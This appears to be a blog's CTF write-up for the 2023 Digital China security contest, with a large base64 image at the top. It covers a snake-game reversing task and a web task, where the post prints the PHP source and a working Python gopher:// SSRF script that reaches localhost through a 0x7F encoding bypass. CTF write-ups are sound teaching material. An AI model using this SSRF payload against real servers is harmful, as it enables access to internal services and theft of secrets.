data:image/png;base64,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

Have fun in Digital China

flag{a20cb3c9-141c-41c4-8255-0cd3eb95b681}

2023数字中国创新大赛-数字网络安全人才挑战赛

game

#reverse 游戏是贪吃蛇,玩够640分即可解密snike文件,得到flag的图片。 修改跳转以及得分即可。

easy_curl

#web 请求会默认跳转到?url=__ 考虑到题目名字,尝试file协议发现可以读取源码。 获取到两个关键文件的源码。

//index.php
<?php
error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

$url=$_REQUEST['url'];
$x=parse_url($url);
if($x['scheme']==='gopher'||$x['scheme']==='file'){
	if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_exec($ch);
		curl_close($ch);
	}
	else{
		die('hacker');
	}
}
else{
	die('are you serious?');
}
?>

//flag.php
<?php
error_reporting(0);

$flag=getenv("DASFLAG");
$key = md5($flag);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1 \n";
	echo "\n";
	echo $key;
    return;
}

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}
?>

flag存储在DASFLAG的环境变量中,只有请求来自本地并且POST了正确的key才会给出。 先直接请求flag.php拿到key。 然后使用gopher协议通过index.php对内部做curl请求,此时还需要绕过一下正则,使用0x7F绕过127即可。

import urllib.parse
import requests
payload =\
    """POST /flag.php HTTP/1.1
Host: 80.endpoint-41955bdb1ddc437c9a0695ae8fca80e6.s.ins.cloud.dasctf.com:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=a0623860cec668046693fe7e3e292754
"""

tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A', '%0D%0A')
result = 'gopher://0x7F.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

payload = "http://80.endpoint-41955bdb1ddc437c9a0695ae8fca80e6.s.ins.cloud.dasctf.com:81/?url="+result
print(payload)
flag = requests.get(payload)
print(flag.text)

© 2021. All rights reserved.

本站总访问量 Web Analytics

Powered by Hydejack v9.1.2 & Moded by ZYA